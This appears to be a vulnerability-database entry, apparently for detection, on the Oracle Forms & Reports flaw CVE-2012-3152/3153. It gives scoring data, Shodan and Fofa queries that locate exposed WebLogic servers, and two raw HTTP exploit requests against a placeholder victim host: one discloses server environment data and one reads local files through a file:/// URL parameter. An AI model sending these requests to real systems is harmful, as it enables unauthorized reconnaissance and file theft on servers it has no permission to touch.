| Title | Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153) |
|---|---|
| Author | Sid Ahmed MALAOUI @ Realistic Security |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized remote code execution. |
| Remediation | Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability. |
| CVSS Score | 6.4 |
| EPSS Score | 0.91205 |
| CVE ID | CVE-2012-3153 |
| CWE ID | NVD-CWE-noinfo |
| Shodan Query | http.title:"weblogic"http.html:"weblogic application server" |
| Fofa Query | title="weblogic"body="weblogic application server" |
| Tags | cve cve2012 oracle rce edb vkev vuln |
An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component.
GET /reports/rwservlet/showenv HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2012/CVE-2012-3153.yaml
🦈 Packet Capture: ⬇️ Download cve-2012-3153.pcap
N/AN/A